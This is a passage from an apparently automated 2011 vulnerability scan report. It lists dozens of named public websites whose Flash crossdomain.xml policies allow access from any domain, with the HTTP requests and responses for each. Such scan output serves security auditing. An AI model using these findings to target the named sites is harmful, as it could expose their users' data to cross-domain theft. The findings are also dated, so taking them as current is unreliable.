Set-Cookie: bncom=173.193.214.243.68811301751865710; path=/; domain=.buzznet.com
Last-Modified: Sat, 01 May 2010 08:01:30 GMT
ETag: "ca-4bdbdfda"
Accept-Ranges: bytes
Content-Length: 202
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...
7.32. http://www.cafemom.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cafemom.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.cafemom.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:25:28 GMT
Server: Apache
Last-Modified: Thu, 21 Jan 2010 22:10:57 GMT
Accept-Ranges: bytes
Content-Length: 201
Vary: Accept-Encoding
Connection: close
Content-Type: application/xml; charset=utf-8

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...
7.33. http://www.cbs.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cbs.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.cbs.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Fri, 13 Aug 2010 17:04:44 GMT
X-Real-Server: ws3182.drt.cbsig.net
Content-Type: application/xml
Cache-Control: max-age=248
Date: Sat, 02 Apr 2011 13:27:26 GMT
Content-Length: 1941
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-access-fro
...[SNIP]...
<allow-access-from domain="wwwimage.cbs.com" />
<allow-access-from domain="cbs.com" />
<allow-access-from domain="cgi.cbs.com" />
<allow-access-from domain="video.cgi.cbs.com" />
<allow-access-from domain="dev.cgi.cbs.com" />
<allow-access-from domain="dev.cbs.cbsig.net" />
<allow-access-from domain="www.cbsnews.com" />
<allow-access-from domain="wwwimage.cbsnews.com" />
<allow-access-from domain="cbsnews.com" />
<allow-access-from domain="cgi.cbsnews.com" />
<allow-access-from domain="video.cgi.cbsnews.com" />
<allow-access-from domain="*.cbs.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.*.cbs.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.cbsnews.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.*.cbsnews.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.sportsline.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.sportsline.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.*.sportsline.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="data.panachetech.com" />
<allow-access-from domain="data15.panachetech.com" />
<allow-access-from domain="*.panachetech.com" />
<allow-access-from domain="*.yourminis.com" />
<allow-access-from domain="vsallaccess.com" />
<allow-access-from domain="www.vsallaccess.com" />
<allow-access-from domain="*.vsallaccess.com" />
<allow-access-from domain="cbsstatic.dev.drt.cbsig.net" />
<allow-access-from domain="*.cbsinteractive.com" />
<allow-access-from domain="*.cnet.com" />
<allow-access-from domain="stage.drt.cbsig.net" />
<allow-access-from domain="*.broccolobster.com" />
...[SNIP]...
7.34. http://www.cbsinteractive.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cbsinteractive.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.cbsinteractive.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:31:53 GMT
Server: Apache/2.2
Accept-Ranges: bytes
Content-Length: 80
Keep-Alive: timeout=15, max=1000
Connection: Keep-Alive
Content-Type: application/xml

<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>
7.35. http://www.cbssports.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cbssports.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.cbssports.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:25:08 GMT
Server: Apache
Last-Modified: Sun, 27 Feb 2011 21:03:46 GMT
Accept-Ranges: bytes
Content-Length: 2798
Cache-Control: max-age=3600
Expires: Sat, 02 Apr 2011 14:25:08 GMT
X-Media: ws1373-fe.tm
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-access-from domain="sportsline.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.sportsline.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.*.sportsline.com" secure="false" />
...[SNIP]...
<allow-access-from domain="cbssports.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.cbssports.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.*.cbssports.com" secure="false" />
...[SNIP]...
<allow-access-from domain="cbsimg.net" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.cbsimg.net" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="cbsgames.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.cbsgames.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.*.cbsgames.com" secure="false" />
...[SNIP]...
<allow-access-from domain="cbsnews.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.cbsnews.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.*.cbsnews.com" secure="false" />
...[SNIP]...
<allow-access-from domain="cbs.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.cbs.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.*.cbs.com" secure="false" />
...[SNIP]...
<allow-access-from domain="ncaa.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.ncaa.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.*.ncaa.com" secure="false" />
...[SNIP]...
<allow-access-from domain="maxpreps.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.maxpreps.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.*.maxpreps.com" secure="false" />
...[SNIP]...
<allow-access-from domain="trupreps.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.trupreps.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.*.trupreps.com" secure="false" />
...[SNIP]...
<allow-access-from domain="cbsig.net" secure="false" />
...[SNIP]...
<allow-access-from domain="*.cbsig.net" secure="false" />
...[SNIP]...
<allow-access-from domain="*.*.cbsig.net" secure="false" />
...[SNIP]...
<allow-access-from domain="*.akamai.net" />
<allow-access-from domain="*.g.akamai.net" />
<allow-access-from domain="beyond.download.akamai.com" />
<allow-access-from domain="cbssports.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.cbssports.com" secure="false" />
...[SNIP]...
<allow-access-from domain="cp32822.edgefcs.net" secure="false" />
...[SNIP]...
<allow-access-from domain="*.doubleclick.net" secure="false" />
...[SNIP]...
<allow-access-from domain="doubleclick.net" />
<allow-access-from domain="*.*.doubleclick.net"/>
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.*.2mdn.net" />
<allow-access-from domain="sandbox.dartmotif.com" />
<allow-access-from domain="my.22squared.com" />
...[SNIP]...
7.36. http://www.clear-request.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.clear-request.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.clear-request.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:04:15 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Thu, 15 Jan 2009 16:15:53 GMT
ETag: "4b90d7-cc-c5400040"
Accept-Ranges: bytes
Content-Length: 204
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...
7.37. http://www.cmt.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cmt.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.cmt.com

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (Unix) mod_jk/1.2.27
Last-Modified: Thu, 14 Aug 2008 20:11:47 GMT
ETag: "1c4250f-121-454711d5526c0"
Accept-Ranges: bytes
Content-Length: 289
Content-Type: application/xml
Cache-Control: max-age=600
Date: Sat, 02 Apr 2011 13:38:06 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false" />

...[SNIP]...
7.38. http://www.colbertnation.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.colbertnation.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.colbertnation.com

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (Unix) PHP/5.3.1
Last-Modified: Wed, 13 Aug 2008 14:31:05 GMT
ETag: "160c686-102-454583d0d9c40"
Accept-Ranges: bytes
Content-Length: 258
Content-Type: application/xml
Cache-Control: max-age=386
Expires: Sat, 02 Apr 2011 14:25:35 GMT
Date: Sat, 02 Apr 2011 14:19:09 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*"/>
   <allow-http-request-hea
...[SNIP]...
7.39. http://www.collegehumor.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.collegehumor.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.collegehumor.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:35:38 GMT
Server: Apache
Last-Modified: Thu, 17 Mar 2011 00:02:39 GMT
ETag: "9c073-235-49ea2612be5c0"
Accept-Ranges: bytes
Content-Length: 565
Vary: Accept-Encoding
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="www.collegehumor.com" />
...[SNIP]...
<allow-access-from domain="dev.collegehumor.com" />
   <allow-access-from domain="staging.collegehumor.com" />
   <allow-access-from domain="collegehumor.com" />
   <allow-access-from domain="*.collegehumor.com" />
   <allow-access-from domain="*.cvcdn.com" />
   <allow-access-from domain="*" to-ports="80"/>
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...
7.40. http://www.comedycentral.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.comedycentral.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.comedycentral.com

Response

HTTP/1.0 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 258
Content-Type: text/xml
Last-Modified: Tue, 15 Apr 2008 20:09:33 GMT
ETag: "102-48050b7d"
Accept-Ranges: bytes
Cache-Control: max-age=72
Expires: Sat, 02 Apr 2011 13:38:15 GMT
Date: Sat, 02 Apr 2011 13:37:03 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*"/>
   <allow-http-request-hea
...[SNIP]...
7.41. http://www.contactatonce.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.contactatonce.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.contactatonce.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:45:56 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Sun, 27 Jun 2010 23:26:28 GMT
ETag: "cb-48a0b5558d100"
Accept-Ranges: bytes
Content-Length: 203
Cache-Control: public, must-revalidate, proxy-revalidate
Expires: Sat, 09 Apr 2011 13:45:56 GMT
Vary: Accept-Encoding,User-Agent
Pragma: public
X-Powered-By: W3 Total Cache/0.9.1.3
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...
7.42. http://www.cracked.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cracked.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.cracked.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8e-fips-rhel5 PHP/5.2.6
Last-Modified: Tue, 14 Jul 2009 21:42:53 GMT
ETag: "bf8fd0-6c-46eb15220f140"-gzip
Content-Type: application/xml
Expires: Sat, 02 Apr 2011 13:33:14 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:33:14 GMT
Content-Length: 108
Connection: close
Set-Cookie: BIGipServerorigin.cracked.com=1083574538.20480.0000; path=/

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

7.43. http://www.crackle.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.crackle.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.crackle.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Fri, 25 Feb 2011 01:20:08 GMT
Accept-Ranges: bytes
ETag: "32a0dd238ad4cb1:f88"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Connection: close
Date: Sat, 02 Apr 2011 13:44:15 GMT
Age: 15631
Content-Length: 126

...<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
</cross-domain-policy>

7.44. http://www.craveonline.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.craveonline.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.craveonline.com

Response

HTTP/1.1 200 OK
Server: Apache/2
Vary: Accept-Encoding
X-Served-By: app1v-fe.sb.lax2
Content-Type: text/xml
Content-Length: 260
Date: Sat, 02 Apr 2011 14:19:13 GMT
X-Varnish: 732507065
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS from pxy1v.sb.lax2

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.gorillanation.com --> <cross-domain-policy>

...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...
7.45. http://www.curse.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.curse.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.curse.com

Response

HTTP/1.1 200 OK
Set-Cookie: BIGipServer=1932476484.20480.0000; path=/
Content-Type: text/xml
Last-Modified: Tue, 06 Apr 2010 00:25:04 GMT
Accept-Ranges: bytes
ETag: "070209a1fd5ca1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:39:41 GMT
Xonnection: Xeep-alive
Content-Length: 332

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-pol
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...
7.46. http://www.daylife.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.daylife.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.daylife.com

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/xml; charset=utf-8
Vary: Accept-Encoding
Content-Length: 140
Date: Sat, 02 Apr 2011 14:19:13 GMT
X-Varnish: 3945368514
Age: 0
Via: 1.1 varnish
Connection: close


<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="*"/>
</cross-domain-policy>
7.47. http://www.degrees.info/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.degrees.info
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.degrees.info

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:37:34 GMT
Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 mod_ssl/2.2.8 OpenSSL/0.9.8g
Last-Modified: Wed, 16 Mar 2011 14:47:14 GMT
ETag: "52c1-db-49e9a9ed8c080"
Accept-Ranges: bytes
Content-Length: 219
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="true" />
</cro
...[SNIP]...
7.48. http://www.docstoc.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.docstoc.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, and allows access from specific subdomains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.docstoc.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Fri, 22 Oct 2010 18:22:44 GMT
Accept-Ranges: bytes
ETag: "b44c91e1672cb1:0"
serverID: web02
Date: Sat, 02 Apr 2011 13:30:53 GMT
Connection: keep-alive
Content-Length: 151

<cross-domain-policy>
   <allow-access-from domain="docstoc.com" to-ports="*" />
   <allow-access-from domain="*" to-ports="*" />
</cross-domain-policy>
7.49. http://www.doctoroz.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.doctoroz.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.doctoroz.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml; charset=utf-8
ETag: "4e5a-c9-4711fc791f940"
Last-Modified: Fri, 14 Aug 2009 20:20:13 GMT
Server: Apache
Cache-Control: max-age=3600
Date: Sat, 02 Apr 2011 13:40:44 GMT
Content-Length: 201
Connection: close
X-N: S

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>
...[SNIP]...
7.50. http://www.ebaumsworld.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ebaumsworld.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ebaumsworld.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:44:31 GMT
Server: Apache/2.2.17 (EL)
Last-Modified: Mon, 02 Feb 2009 22:06:45 GMT
Accept-Ranges: bytes
Content-Length: 213
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" to-ports="*" />
</cross-do
...[SNIP]...
7.51. http://www.education.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.education.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.education.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 02 Apr 2011 13:34:11 GMT
Content-Type: text/xml
Content-Length: 201
Last-Modified: Mon, 28 Feb 2011 18:40:05 GMT
Connection: close
Expires: Thu, 31 Dec 2037 23:55:55 GMT
Cache-Control: max-age=315360000
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...
7.52. http://www.ehow.co.uk/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ehow.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ehow.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Fri, 01 Apr 2011 02:54:34 GMT
Content-Type: text/xml
Date: Sat, 02 Apr 2011 14:00:19 GMT
Content-Length: 117
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>
7.53. http://www.eventful.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.eventful.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.eventful.com

Response

HTTP/1.0 200 OK
Connection: close
Expires: Sat, 16 Apr 2011 13:35:52 GMT
Cache-Control: max-age=1209600
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "1641692581"
Last-Modified: Wed, 10 Feb 2010 18:55:07 GMT
Content-Length: 201
Date: Sat, 02 Apr 2011 13:35:52 GMT
Server: lighttpd

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...
7.54. http://www.everydayhealth.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.everydayhealth.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.everydayhealth.com

Response

HTTP/1.1 200 OK
Content-Length: 369
Content-Type: text/xml
Last-Modified: Fri, 17 Dec 2010 22:02:56 GMT
Accept-Ranges: bytes
ETag: "0e8ca28369ecb1:3da6"
Server: Microsoft-IIS/6.0
ServerID: : USNJWWEB07
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:26:17 GMT
Connection: close

...<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!--used for flash slideshows -->
<cross-domain-policy>
   <site-control permi
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...
7.55. http://www.evtv1.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.evtv1.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.evtv1.com

Response

HTTP/1.1 200 OK
Content-Length: 216
Content-Type: text/xml
Last-Modified: Tue, 03 Mar 2009 14:07:08 GMT
Accept-Ranges: bytes
ETag: "2ed3e15699cc91:1433"
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR PSAi PSDi OUR BUS UNI COM NAV INT STA OTC'
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:53:45 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-
...[SNIP]...
7.56. http://www.ew.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ew.com
Path:   /crossdomain.xml

Issue detail

